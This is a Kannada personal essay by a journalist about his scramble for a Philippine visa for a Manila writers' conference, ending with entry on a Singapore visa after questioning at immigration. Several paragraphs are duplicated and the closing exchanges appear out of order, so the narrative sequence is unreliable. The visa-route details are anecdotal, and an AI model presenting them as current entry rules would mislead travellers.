ವೀಸಾ ಇಲ್ಲದ ಪರದೇಶಿ!

ವಿದೇಶಕ್ಕೆ ಹೋಗಬೇಕಾದರೆ ಆ ದೇಶದ ವೀಸಾ ಬೇಕೇಬೇಕು. ಕಳೆದ ವರ್ಷ ಲೇಖಕರ ಸಮಾವೇಶದಲ್ಲಿ ಭಾಗವಹಿಸಲು ಫಿಲಿಪೈನ್ಸ್‍ನ ರಾಜಧಾನಿ ಮನೀಲಾಗೆ ಹೋಗಬೇಕಾಗಿ ಬಂತು. ‘ವಿಮಾನ, ವಸತಿ, ಸಮಾವೇಶದ ಖರ್ಚು ನಮ್ಮದೇ. ವೀಸಾ ವೆಚ್ಚವನ್ನೂ ನಂತರದಲ್ಲಿ ಭರಿಸುತ್ತೇವೆ. ಅದನ್ನೆಲ್ಲ ಸಿದ್ಧಪಡಿಸುವ ಹೊಣೆ ನಿಮ್ಮದು’ ಅಂದಿದ್ದರು ಸಂಘಟಕರು. ನಾನು ಮಾತ್ರ ವೀಸಾ ಗಿಟ್ಟಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಸೋತು ಹೈರಾಣಾದೆ. ಆದರೂ ಆ ದೇಶ ಕಂಡುಬಂದೆ!

ಈ ವೀಸಾ ನಿಯಮಗಳು ದೇಶದಿಂದ ದೇಶಕ್ಕೆ, ಕಾಲದಿಂದ ಕಾಲಕ್ಕೆ ಬದಲಾಗ್ತಾನೇ ಇರ್ತವೆ. ಅದರಲ್ಲೂ ಭಯೋತ್ಪಾದಕರ ದಾಳಿ, ಮಾರಕ ರೋಗಗಳ ಸಂದರ್ಭದಲ್ಲಿ ಈ ನಿಯಮಗಳು ರಾತ್ರೋರಾತ್ರಿ ಬದಲಾಗಿಬಿಡ್ತಾವು. ನಾನೋ ಆದಷ್ಟೂ ದಲ್ಲಾಳಿಗಳಿಂದ ದೂರ ಇರಬೇಕು, ಯಾವನಿಗೂ ಲಂಚ, ಕಮೀಷನ್ ಕೊಡಬಾರದು ಎಂಬ ಧೋರಣೆಯವನು. ಮೋದಿ ಅವರು ದಾವಣಗೇರಿಗೆ ಬಂದಾಗ `ಮಿಡಲ್ಮೆನ್ ಮುಕ್ತ್ ಭಾರತ್’ ಮಾಡ್ತೀನಿ ಅಂದಾಗ ಜೋರಾಗಿ ಸೀಟಿ ಹೊಡೆದಿದ್ದೆ.

ಈಗ? ಅಂತ ಕೇಳಬ್ಯಾಡ್ರಾ ಮತ್ತ. ದಿಲ್ಲಿಯಲ್ಲಿರುವ ಫಿಲಿಪೈನ್ಸ್ ರಾಯಭಾರ ಕಚೇರಿಯ ಜಾಲತಾಣವನ್ನ ಎರಡು-ಮೂರು ದಿನ ಜಾಲಾಡಿದೆ. `ಪ್ರಯಾಣದ ದಿನದ ನಾಲ್ಕು ಕೆಲಸದ ದಿನಗಳ ಮುಂಚಿತವಾಗಿ ಅರ್ಜಿ ಸಲ್ಲಿಸಬೇಕು’ ಅಂತ ಇತ್ತು. ಅದರ ಕಾನ್ಸುಲೇಟ್ ಕಚೇರಿಗಳಿರೋದು ಮುಂಬಯಿ-ಚೆನ್ನೈನಲ್ಲಿ ಮಾತ್ರ. ಚೆನ್ನೈನಲ್ಲಿರುವ ಗೆಳೆಯನೊಬ್ಬ, ‘ನೀನ ಬರಬೇಕು ಅಂತೇನಿಲ್ಲ, ಎಲ್ಲ ದಾಖಲೆಗಳನ್ನು ಕೋರಿಯರ್ ಮಾಡು. ನಾನು ಕಾನ್ಸುಲೇಟ್ ಆಫೀಸ್ನ್ಯಾಗ ಕೊಟ್ಟು, ವೀಸಾ ರೆಡಿ ಆದ ಮೇಲೆ ನಿನಗ ಕಳಸ್ತೀನಿ’ ಅಂದ. ಸರಿ, ಕೋರಿಯರ್ ಮಾಡಿದೆ.

ಒಂದು ದಿನ ಹೋಯಿತು, ಎರಡು, ಮೂರು… ಹತ್ತನೆಯ ದಿನಕ್ಕೆ ಆ ಗೆಳೆಯ ಹೇಳಿದ-‘ಕರ್ನಾಟಕದವರು ಮುಂಬಯಿ ಆಫೀಸಿಗೇ ಹೋಗಬೇಕಂತ!’ ನಾನು ಚೆನ್ನೈ ಕಾನ್ಸುಲೇಟ್ ಕಚೇರಿಗೆ ಮೇಲ್ ಮಾಡಿದೆ- `ಕರ್ನಾಟಕದವರು ನಮ್ಮ ಆಫೀಸ್‍ಗೇ ಬರಬೇಕು’ ಎಂಬ ಉತ್ತರ ಬಂತು. ಯಾರು ಸುಳ್ಳು? ತನಿಖೆ ಮಾಡಲು ಸಮಯ ಇರಲಿಲ್ಲ.

ಹುಬ್ಬಳ್ಳಿಯಲ್ಲಿರುವ ಯು.ಎ.ಇ. ಎಕ್ಸ್‍ಚೇಂಜ್ ಆಫೀಸಿಗೆ ಧಾವಿಸಿದೆ. ‘ನಿಮ್ಮ ಪ್ರಯಾಣಕ್ಕೆ ಐದ ದಿನ ಉಳದಾವು. ಹಾಗಾಗಿ ನೀವೇ ಚೆನ್ನೈಗೆ ಹೋಗೋದು ಬೆಟರ್’ ಅಂದರು. ಸಂಜೆನೇ ಹುಬ್ಬಳ್ಳಿಯಿಂದ ಚೆನ್ನೈಗೆ ವಿಮಾನ ಹತ್ತಿ, ಬೆಳಗ್ಗೆ ಫಿಲಿಪೈನ್ಸ್ ಕಾನ್ಸುಲೇಟ್ ಕಚೇರಿ ಮುಂದ ಮೊದಲನೆಯ ಅರ್ಜಿದಾರನಾಗಿ ನಿಂತಿದ್ದೆ. `ನಿಮ್ಮ ಪ್ರಯಾಣಕ್ಕೆ ನಾಲ್ಕ ದಿನ ಉಳದಾವು, ವೀಸಾ ನೀಡಲಾಗದು’ ಅಂದುಬಿಟ್ಟಳು ಅಧಿಕಾರಿಣಿ. ‘ಮತ್ತ ನಿಮ್ಮ ವೆಬ್‍ಸೈಟ್‍ನ್ಯಾಗ ನಾಲ್ಕು ಕೆಲಸದ ದಿನಗಳು ಅಂತ ಐತೆಲ್ಲ?’ ಪ್ರಶ್ನಿಸಿದೆ-ವಿನಯಪೂರ್ವಕವಾಗಿ. ‘ಅದು ಹಳೆಯ ನಿಯಮ. ಎಂಟು ದಿನಗಳ ಹೊಸ ನಿಯಮ ಜಾರಿಯಾಗಿ ಆರು ತಿಂಗಳಾಯ್ತು’ ಅಂದಳಾಕೆ. ‘ಇದನ್ನ ವೆಬ್‍ಸೈಟ್‍ಗೆ ಹಾಕಾಕ ಎಷ್ಟು ವರ್ಷ ಬೇಕು ನಿಮಗ?’ ಅಂತ ದಬಾಯಿಸಬೇಕೆಂದುಕೊಂಡೆ. ಹೊತ್ತು ಬಂದಾಗ ಕತ್ತೆ ಕಾಲನ್ನೂ ಹಿಡೀಬೇಕು ಅನ್ನೋದು ನೆನಪಾತು. ‘ಈಗ ಬೇರೆ ಯಾವ ದಾರಿಯೂ ಇಲ್ಲ’ ಎನ್ನುತ್ತ ‘ನೆಕ್ಸ್‍ಟ್…’ ಅಂತ ನನ್ನ ಹೊರಹಾಕಿದಳು.

‘ಹೌದಾ? ಬೇಸರಿಸಿಕೊಳ್ಳಬೇಡಿ. ಮತ್ತೆ ಅವಕಾಶಗಳು ಬಂದೇ ಬರುತ್ತವೆ..’ ಎಂದೆಲ್ಲ ಸಾಂತ್ವನ ಶುರು ಮಾಡಿದರು! ‘ಸರ್ ಸರ್, ನೀವು ಈಗ ಯಾರಿಗಾದರೂ ಹೇಳಿ ನನಗೆ ವೀಸಾ ಸಿಗುವಂತೆ ಮಾಡಲು ಸಾಧ್ಯವೇ?’ ಅವರ ಸಾಂತ್ವನವನ್ನು ತುಂಡರಿಸಿದೆ.

ಯಾವುದಕ್ಕೂ ಇರಲಿ ಅಂತ ಕೇಂದ್ರ ಸರಕಾರದಲ್ಲಿ ಪ್ರಭಾವ ಹೊಂದಿರುವ ವಿದ್ವಾಂಸರೊಬ್ಬರಿಗೆ ಮೊದಲೇ ತಿಳಿಸಿದ್ದೆ. ‘ಚೆನ್ನೈಗೆ ಹೋಗಿ ಟ್ರೈ ಮಾಡಿ. ಆಗದಿದ್ದರೆ ನೋಡೋಣ’ ಎಂಬ ಅಭಯ ನೀಡಿದ್ದರವರು. ಕರೆ ಮಾಡಿದೆ. ‘ಹೌದಾ? ಬೇಸರಿಸಿಕೊಳ್ಳಬೇಡಿ. ಮತ್ತೆ ಅವಕಾಶಗಳು ಬಂದೇ ಬರುತ್ತವೆ..’ ಎಂದೆಲ್ಲ ಸಾಂತ್ವನ ಶುರು ಮಾಡಿದರು! ‘ಸರ್ ಸರ್, ನೀವು ಈಗ ಯಾರಿಗಾದರೂ ಹೇಳಿ ನನಗೆ ವೀಸಾ ಸಿಗುವಂತೆ ಮಾಡಲು ಸಾಧ್ಯವೇ?’ ಅವರ ಸಾಂತ್ವನವನ್ನು ತುಂಡರಿಸಿದೆ. ‘ಅದು ನಾಲ್ಕು ದಿನಗಳಲ್ಲಿ ಆಗುವಂಥದ್ದಲ್ಲ…’ ರಾಗ ಎಳೆಯತೊಡಗಿದರು. ‘ಸರಿ ಸರ್, ಲೆಟ್ ಮಿ ಟ್ರೈ’ ಎನ್ನುತ್ತ ಅವರ ಕರೆಯನ್ನು ಕತ್ತರಿಸಿದೆ!

ಮತ್ತೆ ಓಳಹೋಗಿ ಅಧಿಕಾರಿಣಿಗೆ ಗೋಗರೆದೆ. ‘ಆರ್ ಯೂ ಎ ಜರ್ನಲಿಸ್ಟ್?’ ಎಂದಳಾಕೆ. ಮಿಂಚು ಹೊಡೆದಂತಾಯಿತು. ‘ಮೊನ್ನೆ ಮೇಲ್ ಮಾಡಿದ್ದು ನೀವೇ ಅಲ್ಲವೇ?’ ಎಂದಳು. ಡೀಲ್ ಕುದುರಿದಂತಾಯಿತು. ‘ಸ್ವಲ್ಪ ಹತ್ತಿರಕ್ಕೆ ಬನ್ನಿ… ಸಿಂಗಾಪೂರ್ ವೀಸಾ ಪಡೆದು ಫಿಲಿಪೈನ್ಸ್‍ಗೆ ಹೋಗಬಹುದು. ನಾನು ಅಫೀಶಿಯಲ್ ಆಗಿ ಈ ಮಾತು ಹೇಳೋಕಾಗಲ್ಲ, ಏನೋ ನಿಮ್ಮ ಪೇಚಾಟ ನೋಡಿ ಹೇಳ್ತೀದಿನಿ’ ಮೆತ್ತಗೆ ಉಸುರಿದಳು.

ನನ್ನ ಟಿಕೆಟ್‍ಗಳು ಸಿಂಗಾಪೂರ ಏರ್‍ಲೈನ್ಸ್‍ನಲ್ಲಿ ಸಿಂಗಾಪೂರ ಮೂಲಕವೇ ಮನೀಲಾ ತಲುಪುವಂತೆ ಬುಕ್ ಆಗಿದ್ದವು. ಹೊರಬಂದು ಮೊಬೈಲ್‍ನಲ್ಲೇ ಗೂಗಲ್ ಬಾಬಾಗೆ ಪ್ರಶ್ನಿಸಿದೆ. ‘ಸಿಂಗಾಪೂರದ ಉದ್ಯೋಗ, ವ್ಯವಹಾರ, ವಿದ್ಯಾರ್ಥಿ ವೀಸಾ ಹೊಂದಿದ ಭಾರತೀಯರು ಫಿಲಿಪೈನ್ಸ್‍ಗೆ ತೆರಳಬಹುದು’ ಎಂಬ ಉತ್ತರ ಕಾಣಿಸಿತು. ಆದರೆ ಪ್ರವಾಸಿ ವೀಸಾದ ಉಲ್ಲೇಖವೇ ಇರಲಿಲ್ಲ! ಸರಿ, ಓಲಾ ಕ್ಯಾಬ್ ಹಿಡಿದು ಸಿಂಗಾಪೂರ್ ಕಾನ್ಸುಲೇಟ್ ಕಚೇರಿಗೆ ಧಾವಿಸಿದೆ. ‘ಮೊದಲೇ ಅಪಾಯಿಂಟ್‍ಮೆಂಟ್ ಪಡೆದಿರಬೇಕು’ ಎಂದ ಗಾರ್ಡ್ ನನ್ನ ಕಥೆಯನ್ನು ಆಲಿಸಿ, ಒಳಗಿನ ಒಬ್ಬ ಅಧಿಕಾರಿಯ ಲ್ಯಾಂಡ್‍ಲೈನ್ ನಂಬರ್ ಕೊಟ್ಟ.

‘ಸಿಂಗಾಪೂರ್ ವೀಸಾ ಇದ್ದರೆ ಫಿಲಿಪೈನ್ಸ್‍ಗೆ ಹೋಗಬಹುದು ಅನ್ನೋದರ ಬಗ್ಗೆ ನಮಗೆ ಮಾಹಿತಿ ಇಲ್ಲ ಸರ್. ಮತ್ತೆ ಸಿಂಗಾಪೂರ್ ವೀಸಾ ಪಡೆಯಲು ಕನಿಷ್ಠ ಎರಡು ವರ್ಕಿಂಗ್ ಡೇಸ್ ಬೇಕು’ ಅಂದರು ದೇವಿಕಾ. ‘ಆಯಿತು, ಅಪ್ಲೈ ಮಾಡಿ ನೋಡೋಣ’ ಎಂದ್ಹೇಳಿ ಪಾಸ್‍ಪೋರ್ಟ್, ಇತರ ದಾಖಲೆಗಳನ್ನು, ಶುಲ್ಕವನ್ನು ಕೊಟ್ಟು ಬಂದೆ.

ಕರೆ ಮಾಡಿದೆ-‘ನನಗೆ ವೀಸಾ ಬೇಕಿತ್ತು..’

ಆತ-‘ಯಾವುದಾದರೂ ಏಜೆನ್ಸಿ ಮೂಲಕ ಬನ್ನಿ’

‘ಪ್ರಯಾಣಕ್ಕೆ ನಾಲ್ಕು ದಿನ ಉಳಿದಿದೆ, ಈಗ ಅಪ್ಲೈ ಮಾಡಿದರೆ ಸಿಗಬಹುದಾ?’

‘ಏಜೆನ್ಸಿಗೆ ಕೇಳಿ’

‘ಏಜೆನ್ಸಿಗಳ ಸಂಪರ್ಕ ಸಂಖ್ಯೆಯನ್ನಾದರೂ ಕೊಡಿ’

‘ನಮ್ಮ ವೆಬ್‍ಸೈಟ್ ನೋಡಿ’

ಇವನೌನ, ಸಿಂಗಾಪೂರದಲ್ಲಿ ಭ್ರಷ್ಟಾಚಾರನ ಇಲ್ಲ ಅಂತಾರ, ಇವನೋ `ಏಜೆಂಟೇ ತಂದೆ ತಾಯಿ…’ ಅನ್ನೋರ ತರಹ ಮಾತಾಡ್ತಾನಲ್ಲ, ಗೊಣಗಿಕೊಂಡೆ.

ಹುಬ್ಬಳ್ಳಿಯ ಯು.ಎ.ಇ. ಎಕ್ಸ್‍ಚೇಂಜ್ ಆಫೀಸಿನ ಸಿಬ್ಬಂದಿಯೊಬ್ಬರಿಗೆ ಕರೆ ಮಾಡಿದೆ. ತಮ್ಮ ಚೆನ್ನೈ ಕಚೇರಿಯಲ್ಲಿ ದೇವಿಕಾ ಅವರನ್ನು ಕಾಣಲು ಹೇಳಿದರು. ಮತ್ತೊಂದು ಓಲಾ ಕ್ಯಾಬ್ ಹಿಡಿದು ಗ್ರೀಮ್ಸ್ ರೋಡ್‍ನಲ್ಲಿರುವ ಯು.ಎ.ಇ. ಆಫೀಸ್‍ಗೆ ಓಡಿದೆ. ‘ಸಿಂಗಾಪೂರ್ ವೀಸಾ ಇದ್ದರೆ ಫಿಲಿಪೈನ್ಸ್‍ಗೆ ಹೋಗಬಹುದು ಅನ್ನೋದರ ಬಗ್ಗೆ ನಮಗೆ ಮಾಹಿತಿ ಇಲ್ಲ ಸರ್. ಮತ್ತೆ ಸಿಂಗಾಪೂರ್ ವೀಸಾ ಪಡೆಯಲು ಕನಿಷ್ಠ ಎರಡು ವರ್ಕಿಂಗ್ ಡೇಸ್ ಬೇಕು’ ಅಂದರು ದೇವಿಕಾ. ‘ಆಯಿತು, ಅಪ್ಲೈ ಮಾಡಿ ನೋಡೋಣ’ ಎಂದ್ಹೇಳಿ ಪಾಸ್‍ಪೋರ್ಟ್, ಇತರ ದಾಖಲೆಗಳನ್ನು, ಶುಲ್ಕವನ್ನು ಕೊಟ್ಟು ಬಂದೆ. ವೀಸಾ ರೆಡಿಯಾದ ಮೇಲೆ ನನ್ನ ಪಾಸ್‍ಪೋರ್ಟನ್ನು ಬೆಂಗಳೂರಿನ ಎಂ.ಜಿ. ರಸ್ತೆಯಲ್ಲಿರುವ ಯು.ಎ.ಇ. ಕಚೇರಿಗೆ ಕಳಿಸುವುದಾಗಿ, ನಾನು ಅಲ್ಲಿಂದ ಶನಿವಾರ ಕಲೆಕ್ಟ್ ಮಾಡಿಕೊಳ್ಳುವ ನಿರ್ಧಾರವಾಯಿತು. ಚೆನ್ನೈನಿಂದ ಹುಬ್ಬಳ್ಳಿಗೆ ಬರುವಾಗ ವೊಲ್ವೊ ಬಸ್‍ನಲ್ಲಿ ಮೊಬೈಲ್‍ನಲ್ಲಿ ಸರ್ಚ್ ಮಾಡಿದ್ದೇ ಮಾಡಿದ್ದು!

ಮತ್ತೇನಾದರೂ ಬೇಕಾದರೆ ನಮ್ಮನ್ನು ಸಂಪರ್ಕಿಸಿ…’ ಎಂಬ ಉತ್ತರ ಬಂತು. ತಲೆಕೆಟ್ಟು ಫಿಲಿಪೈನ್ಸ್‍ನ ವಿದೇಶಾಂಗ ಕಚೇರಿಗೇ ಮೇಲ್ ಮಾಡಿದೆ. ದೆಹಲಿಯಲ್ಲಿರುವ ಫಿಲಿಪೈನ್ಸ್‍ನ ರಾಯಭಾರ ಕಚೇರಿಗೆ ಅವರ ವೆಬ್‍ಸೈಟ್‍ಗಳಲ್ಲಿರುವ ತಪ್ಪು ಮಾಹಿತಿ, ಅರ್ಧಬಂರ್ಧ ವಿವರ ಎಲ್ಲವನ್ನೂ ವಿವರವಾಗಿ ಮೇಲ್ ಮಾಡಿದೆ. ನೋ ರಿಪ್ಲೈ.

ಸಿಂಗಾಪೂರ್ ವೀಸಾ ಮರುದಿನವೇ ಸಿಕ್ತು. ಅವಧಿ ಒಂದು ವರ್ಷ. ದೇವಿಕಾ ಕರೆ ಮಾಡಿ ಮೇಲ್‍ಗೆ ಅದರ ಪ್ರತಿ ಹಾಕಿರುವುದಾಗಿ ತಿಳಿಸಿದರು.

ಫಿಲಿಪೈನ್ಸ್ ಕಾನ್ಸುಲೇಟ್‍ನ ಅಧಿಕಾರಿಣಿ ಅಫೀಶಿಯಲ್ಲಾಗಿ ಹೇಳಿಲ್ಲವಲ್ಲ. ಫಿಲಿಪೈನ್ಸ್ ವೆಬ್‍ಸೈಟ್‍ನಲ್ಲಿರುವ 2016ರ ಒಂದು ಸುತ್ತೋಲೆ ಪ್ರಕಾರ ಪ್ರವಾಸಿ ವೀಸಾ ಹೊಂದಿರುವ ಭಾರತೀಯರು ಫೀಲಿಪೈನ್ಸ್ ಪ್ರವೇಶಿಸುವುದನ್ನು ನಿಷೇಧಿಸಲಾಗಿದೆ! ನನ್ನ ವಿಮಾನ ಟಿಕೆಟ್ ಬುಕ್ ಆಗಿದ್ದ ಸಿಂಗಪೂರ ಏರ್‍ಲೈನ್ಸ್‍ಗೆ ಮೇಲ್ ಮಾಡಿದೆ. ‘ನಮ್ಮದು ವಿಮಾನ ಸೇವೆ ಮಾತ್ರ. ವೀಸಾ ಮಾಹಿತಿ ನಮ್ಮ ಬಳಿ ಇರಲ್ಲ. ಮತ್ತೇನಾದರೂ ಬೇಕಾದರೆ ನಮ್ಮನ್ನು ಸಂಪರ್ಕಿಸಿ…’ ಎಂಬ ಉತ್ತರ ಬಂತು. ತಲೆಕೆಟ್ಟು ಫಿಲಿಪೈನ್ಸ್‍ನ ವಿದೇಶಾಂಗ ಕಚೇರಿಗೇ ಮೇಲ್ ಮಾಡಿದೆ. ದೆಹಲಿಯಲ್ಲಿರುವ ಫಿಲಿಪೈನ್ಸ್‍ನ ರಾಯಭಾರ ಕಚೇರಿಗೆ ಅವರ ವೆಬ್‍ಸೈಟ್‍ಗಳಲ್ಲಿರುವ ತಪ್ಪು ಮಾಹಿತಿ, ಅರ್ಧಬಂರ್ಧ ವಿವರ ಎಲ್ಲವನ್ನೂ ವಿವರವಾಗಿ ಮೇಲ್ ಮಾಡಿದೆ. ನೋ ರಿಪ್ಲೈ.

ನನ್ನೆಲ್ಲ ಪ್ರಯತ್ನಗಳನ್ನು ಮನೀಲಾದಲ್ಲಿದ ಸಂಘಟಕರ ಜೊತೆ ಹಂಚಿಕೊಳ್ಳುತ್ತಲೇ ಇದ್ದೆ. ಅವರೂ ಅತ್ತ ಕಡೆಯಿಂದ ಪ್ರಯತ್ನ ಮಾಡುತ್ತಲೇ ಇದ್ದರು. ಅಲ್ಲಿಯೂ ಸಮರ್ಪಕ ಉತ್ತರ ಸಿಗವಲ್ದಾಗಿತ್ತು.

ಅದನ್ನೇ ರೆಕಾರ್ಡ್ ಮಾಡಿಕೊಂಡು, ಧ್ವನಿಮುದ್ರಿಕೆಯನ್ನು ನನ್ನ ಹೆಂಡತಿ ಮತ್ತು ಕೆಲವು ಮಿತ್ರರ ವಾಟ್ಸ್ಯಾಪ್‍ಗೆ ಹಾಕಿ, ‘ಮನೀಲಾದಲ್ಲಿ ನನ್ನನ್ನೇನಾದರೂ ಬಂಧಿಸಿದರೆ ನೀವು ಇದನ್ನು ವಿದೇಶಾಂಗ ಸಚಿವೆ ಸುಷ್ಮಾ ಸ್ವರಾಜ್‍ಗೆ ಟ್ವೀಟ್ ಮಾಡಿ’ ಅಂತ ತಿಳಿಸಿದೆ.

ಕಾನ್ಸುಲೇಟ್ ಅಧಿಕಾರಿಣಿ ಅನ್‍ಅಫೀಶಿಯಲ್ ಆಗಿ ಹೇಳಿದ್ದನ್ನು ಅಫೀಶಿಯಲ್ ಮಾಡಿಕೊಳ್ಳುವ ಐಡಿಯಾ ಹೊಳೀತು. ಅದೇ ಕಚೇರಿಗೆ ಕರೆ ಮಾಡಿ ಕೇಳಿದೆ. ‘ಹೋಗಬಹುದು, ಆದರೆ ಹೋಟೆಲ್ ಬುಕಿಂಗ್‍ನ ದಾಖಲೆ, ರಿಟರ್ನ್ ಟಿಕೆಟ್ ಇರಬೇಕು. 14 ದಿನಕ್ಕಿಂತ ಹೆಚ್ಚು ಅಲ್ಲಿ ತಂಗುವಂತಿಲ್ಲ’ ಎಂಬ ಉತ್ತರ ಸಿಕ್ತು. ಅದನ್ನೇ ರೆಕಾರ್ಡ್ ಮಾಡಿಕೊಂಡು, ಧ್ವನಿಮುದ್ರಿಕೆಯನ್ನು ನನ್ನ ಹೆಂಡತಿ ಮತ್ತು ಕೆಲವು ಮಿತ್ರರ ವಾಟ್ಸ್ಯಾಪ್‍ಗೆ ಹಾಕಿ, ‘ಮನೀಲಾದಲ್ಲಿ ನನ್ನನ್ನೇನಾದರೂ ಬಂಧಿಸಿದರೆ ನೀವು ಇದನ್ನು ವಿದೇಶಾಂಗ ಸಚಿವೆ ಸುಷ್ಮಾ ಸ್ವರಾಜ್‍ಗೆ ಟ್ವೀಟ್ ಮಾಡಿ’ ಅಂತ ತಿಳಿಸಿದೆ. ‘ಇಷ್ಟೆಲ್ಲ ರಿಸ್ಕ್ ಇದ್ದರೆ ಯಾಕೆ ಹೋಗಬೇಕು, ಬಿಟ್ಟುಬಿಡ್ರಿ..’ ಪತ್ನಿಯ ಆತಂಕದ ಸಲಹೆ. ನನಗೆ ಹೋಗಲೇಬೇಕೆಂಬ ಹಟ.

ಕನಿಷ್ಠ ಸಿಂಗಾಪೂರ್‍ವರೆಗಾದರೂ ಹೋಗಿ ಬಂದರಾಯ್ತು ಅಂತ ಹೊರಟೆ. ಶನಿವಾರ ರಾತ್ರಿ ಬೆಂಗಳೂರು ಏರ್‍ಪೋರ್ಟ್‍ನ ಸಿಂಗಾಪೂರ ಏರ್‍ಲೈನ್ಸ್ ಕೌಂಟರ್‍ಗೆ ತಲುಪಿದೆ. ಅವರು ಲಗೇಜನ್ನು ನೇರವಾಗಿ ಮನೀಲಾಗೆ ಹಾಕುವುದಾಗಿ ಹೇಳಿದರು. ‘ನನಗೆ ಫಿಲಿಪೈನ್ಸ್ ವೀಸಾ ಸಿಕ್ಕಿಲ್ಲ. ಸಿಂಗಾಪೂರ್ ಏರ್‍ಪೋರ್ಟ್‍ನಿಂದ ಮನೀಲಾ ವಿಮಾನ ಹತ್ತಲು ಫಿಲಿಪೈನ್ಸ್ ಇಮ್ಮಿಗ್ರೇಶನ್‍ನನವರು ನನ್ನನ್ನು ಬಿಡಲಿಕ್ಕಿಲ್ಲ’ ಎಂದೆ. ಅವರಿಗೂ ಗೊಂದಲ. ಅದ್ಯಾರಿಗೋ ಫೋನ್ ಮಾಡಿ ಕೇಳಿ, ‘ನಿಮಗೆ ಸಿಂಗಾಪೂರ ಏರ್‍ಪೋರ್ಟನಲ್ಲಿ ಇಮ್ಮಿಗ್ರೇಶನ್ ಚೆಕ್ ಇರಲ್ಲ. ನಿಮ್ಮ ಚೆಕ್ಕಿಂಗ್ ಏನಿದ್ದರೂ ಮನೀಲಾದಲ್ಲೇ ಇರತ್ತೆ’ ಎಂದರು.

‘ಫಿಲಿಪೈನ್ಸ್ ವೀಸಾ ಯಾಕಿಲ್ಲ?’ ಎಂದ ಅಧಿಕಾರಿ. ನನ್ನ ಬಳಿ ಫಿಲಿಪೈನ್ಸ್ ವೀಸಾ ಪಡೆಯಲು ಮಾಡಿದ ಯತ್ನಗಳ ದಾಖಲೆಗಳು, ಸಾಕ್ಷ್ಯಗಳು ಇದ್ದವು. ಅವರ ವೆಬ್‍ಸೈಟ್‍ನಲ್ಲಿರುವ ಮಾಹಿತಿ, ಅವರ ಪತ್ರಿಕಾ ಪ್ರಕಟಣೆಗಳ ತುಣಿಕುಗಳು ಎಲ್ಲವುಗಳ ಪ್ರಿಂಟೌಟ್‍ಗಳನ್ನು ಇಟ್ಟೆ.

ರಾತ್ರಿ ಹನ್ನೊಂದು ಗಂಟೆಗೆ ವಿಮಾನ ಹತ್ತಿದೆ. ಸಿಬ್ಬಂದಿ ಹೇಳಿದಂತೆ ನನಗೆ ಸಿಂಗಾಪೂರ ಏರ್‍ಪೋರ್ಟ್‍ನಲ್ಲಿ ತಡೆ ಎದುರಾಗಲಿಲ್ಲ. ನಾಲ್ಕು ತಾಸುಗಳ ನಿದ್ದೆಯ ನಂತರ ಮನೀಲಾ ವಿಮಾನ ಹತ್ತಿದ್ದಾಯ್ತು. ಮಧ್ಯಾಹ್ನದ ಹೊತ್ತಿಗೆ ಅಲ್ಲಿನ ಇಮ್ಮಿಗ್ರೇಶನ್ ಕ್ಲಿಯರೆನ್ಸ್‍ಗೆ ಹೋದೆ. ‘ಫಿಲಿಪೈನ್ಸ್ ವೀಸಾ ಯಾಕಿಲ್ಲ?’ ಎಂದ ಅಧಿಕಾರಿ. ನನ್ನ ಬಳಿ ಫಿಲಿಪೈನ್ಸ್ ವೀಸಾ ಪಡೆಯಲು ಮಾಡಿದ ಯತ್ನಗಳ ದಾಖಲೆಗಳು, ಸಾಕ್ಷ್ಯಗಳು ಇದ್ದವು. ಅವರ ವೆಬ್‍ಸೈಟ್‍ನಲ್ಲಿರುವ ಮಾಹಿತಿ, ಅವರ ಪತ್ರಿಕಾ ಪ್ರಕಟಣೆಗಳ ತುಣಿಕುಗಳು ಎಲ್ಲವುಗಳ ಪ್ರಿಂಟೌಟ್‍ಗಳನ್ನು ಇಟ್ಟೆ.

ಹೋಟೆಲ್ ಬುಕ್ ಮಾಡಿದ್ದು ನಮ್ಮ ಸಮಾವೇಶದ ಸಂಘಟಕರು. ಇದು ಗೊತ್ತಾಗುತ್ತಲೇ ಆತ, ‘ನೀವು ಸಿಂಗಾಪೂರದ ಪ್ರವಾಸಿ ವೀಸಾ ಪಡೆದು, ಫಿಲಿಪೈನ್ಸ್‍ನಲ್ಲಿ ಕಾನ್‍ಫರೆನ್ಸ್‍ನಲ್ಲಿ ಭಾಗವಹಿಸುತ್ತಿರುವುದೇಕೆ?’ ಎಂದ. ನಾನು ನನ್ನ ಮೊಬೈಲ್‍ನಲ್ಲಿದ್ದ ಚೆನ್ನೈ ಕಾನ್ಸುಲೇಟ್ ಕಚೇರಿ ಜೊತೆ ನಡೆಸಿದ್ದ ಧ್ವನಿಮುದ್ರಿಕೆಯನ್ನು ಆತನಿಗೆ ತೋರಿಸಿದೆ. ‘ನೀವು ಏನು ಕೆಲಸ ಮಾಡ್ತೀರಿ?’ ಕೇಳಿದನಾತ. ಪತ್ರಕರ್ತ ಎಂದ್ಹೇಳಿ, ನನ್ನ ಐಡಿ ಕಾರ್ಡ್, ನೇಮಕಾತಿ ಪತ್ರ, ವೇತನದ ಸ್ಲಿಪ್ ಹಾಜರುಪಡಿಸಿದೆ.

‘ಇಂಡಿಯಾಗೆ ವಾಪಸಾಗಬೇಕಾ?’ ಕೇಳಿದೆ, ‘ನೋ ನೋ ಯೂ ಕ್ಯಾನ್ ಎಂಜಾಯ್ ಇನ್ ಮನೀಲಾ.. ಗೋ ಅಹೆಡ್’. ಈ ಉತ್ತರ ಕೇಳಿ ವಿಶ್ವಯುದ್ಧ ಗೆದ್ದಷ್ಟು ಖುಷಿಯಾಯಿತು!

‘ಪ್ರವಾಸಿಗನಾಗಿ ಬಂದು ಕಾನ್‍ಫರೆನ್ಸ್‍ನಲ್ಲಿ ಭಾಗವಹಿಸುವುದು ತಪ್ಪು’

‘ಆ ತಪ್ಪಿಗೆ ನಿಮ್ಮ ವೆಬ್‍ಸೈಟ್‍ನಲ್ಲಿರುವ ತಪ್ಪು ತಪ್ಪು ಮಾಹಿತಿಯೇ ಕಾರಣ’. ಮೆದುವಾದ ದನಿಯಲ್ಲಿ ಒಳಗಿನ ಭಯವನ್ನು ಹತ್ತಿಕ್ಕಿಕೊಳ್ಳುತ್ತಲೇ ವಾದಿಸಿದೆ. ‘ನೀವು ಅನುಮತಿ ನೀಡಲ್ಲ ಎಂದಾದರೆ ನೋ ಪ್ರಾಬ್ಲಂ, ಈಗಲೇ ಇಂಡಿಯಾಗೆ ವಾಪಸಾಗುತ್ತೇನೆ’ -ನನ್ನನ್ನು ಬಂಧಿಸದೇ ಬಿಟ್ಟರೆ ಸಾಕೆಂಬ ಬೇಡಿಕೆಯೂ ಇತ್ತು ಈ ಕೋರಿಕೆಯಲ್ಲಿ!

